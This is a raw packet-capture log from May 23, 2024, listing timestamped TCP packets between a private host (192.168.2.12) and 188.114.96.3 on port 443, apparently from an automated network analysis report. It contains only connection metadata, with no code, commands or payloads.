                May 23, 2024 18:26:38.709435940 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.710176945 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.710217953 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.710282087 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.710288048 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.710329056 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.711651087 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.711683989 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.711729050 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.711736917 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.711762905 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.711776018 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.716375113 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.716404915 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.716490030 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.716495991 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.716531992 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.717299938 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.717329979 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.717365980 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.717370987 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.717396975 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.717447996 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.718185902 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.718214035 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.718275070 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.718280077 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.718316078 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.719347954 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.719374895 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.719409943 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.719429016 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.719455004 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.719466925 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.720101118 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.720128059 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.720168114 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.720175028 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.720211029 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.798835993 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.798868895 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.798916101 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.798945904 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.798980951 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.798994064 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.799010038 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.799575090 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.799593925 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.799649000 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.799655914 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.809561968 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.809593916 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.809696913 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.809703112 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.810533047 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.810553074 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.810594082 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.810614109 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.810616970 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.810632944 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.810641050 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.810676098 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.812071085 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.812096119 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.812140942 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.812155008 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.812166929 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.812181950 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.812225103 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.887120008 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.887147903 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.887202978 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.887232065 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.887244940 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.887268066 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.887814999 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.887833118 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.887888908 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.887895107 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.887928009 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.888789892 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.888808012 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.888870955 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.888876915 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.888912916 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.898799896 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.898823023 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.898916960 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.898936987 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.898978949 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.900243998 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.900268078 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.900327921 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.900333881 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.900346994 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.900371075 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.903261900 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.903283119 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.903341055 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.903348923 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.903361082 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.903387070 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.903492928 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.903510094 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.903565884 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.903572083 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.903610945 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.904999018 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.905024052 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.905064106 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.905070066 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.905095100 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.905107975 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.978166103 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.978195906 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.978305101 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.978324890 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.978372097 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.978811979 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.978831053 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.978879929 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.978885889 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.978920937 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.980936050 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.980954885 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.981012106 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.981019020 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.981057882 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.988370895 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.988396883 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.988476992 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.988486052 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.988527060 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.989397049 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.989420891 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.989492893 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.989500046 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.989590883 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.990377903 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.990406036 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.990578890 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.990585089 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.990768909 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.991530895 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.991555929 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.991607904 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.991614103 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.991643906 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.991657972 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.992455006 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.992470980 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.992512941 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.992518902 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:38.992551088 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:38.992564917 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.068022966 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.068053007 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.068202019 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.068222046 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.068263054 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.069623947 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.069644928 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.069696903 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.069704056 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.069742918 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.070405006 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.070425034 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.070497990 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.070502996 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.070540905 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.077327967 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.077344894 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.077419043 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.077429056 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.077465057 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.078275919 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.078291893 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.078336954 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.078344107 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.078362942 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.078382969 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.079128981 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.079147100 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.079199076 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.079206944 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.079242945 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.080677986 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.080696106 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.080754042 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.080760956 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.080796957 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.081592083 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.081610918 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.081665993 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.081672907 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.081712961 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.156451941 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.156508923 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.156723022 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.156764984 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.156820059 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.157196045 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.157217979 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.157269001 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.157274961 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.157314062 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.158679962 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.158704042 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.158760071 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.158766985 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.158806086 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.166312933 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.166336060 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.166486025 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.166522026 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.166593075 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.167186975 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.167205095 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.167268038 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.167280912 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.167319059 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.168441057 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.168459892 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.168550014 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.168562889 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.168605089 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.169234037 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.169255018 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.169311047 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.169321060 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.169358969 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.169684887 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.169703007 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.169760942 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.169769049 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.169806004 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.245031118 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.245059967 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.245165110 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.245191097 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.245232105 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.246113062 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.246130943 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.246181011 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.246189117 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.246222019 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.246829987 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.246848106 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.246892929 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.246896982 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.246932983 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.255305052 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.255326986 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.255485058 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.255508900 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.255554914 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.255968094 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.255994081 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.256021023 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.256031990 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.256055117 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.256071091 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.257088900 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.257110119 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.257152081 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.257168055 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.257204056 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.257751942 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.257767916 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.257813931 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.257823944 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.257858992 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.258300066 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.258330107 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.258352995 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.258363008 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.258387089 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.258403063 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.341561079 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.341590881 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.341784954 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.341811895 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.341861963 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.342649937 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.342669964 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.342756987 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.342761993 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.342792988 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.343540907 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.343570948 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.343674898 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.343679905 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.343733072 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.346084118 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.346115112 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.346221924 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.346232891 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.346275091 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.346687078 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.346712112 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.346803904 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.346807957 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.346848011 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.347665071 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.347692013 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.347779036 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.347784042 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.347824097 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.348731995 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.348766088 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.348896980 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.348902941 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.348978996 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.349497080 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.349515915 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.349575043 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.349579096 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.349666119 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.430674076 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.430700064 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.430809021 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.430839062 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.430886984 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.431332111 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.431350946 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.431391001 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.431395054 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.431421041 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.431436062 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.432276964 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.432292938 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.432332039 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.432337046 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.432362080 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.432379961 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.435524940 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.435542107 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.435610056 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.435615063 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.435636044 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.435657978 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.436562061 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.436578989 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.436647892 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.436652899 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.436702967 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.437912941 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.437931061 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.437983036 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.437988043 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.437999010 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.438014984 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.438020945 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.438039064 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.438044071 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.438079119 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.438111067 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.438327074 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.438342094 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.438399076 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.438404083 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.438450098 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.523195028 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.523217916 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.523437023 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.523459911 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.523531914 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.524818897 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.524837017 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.524908066 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.524916887 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.524955034 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:39.525841951 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.525860071 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:39.525907040 CEST49720443192.168.2.12188.114.96.3
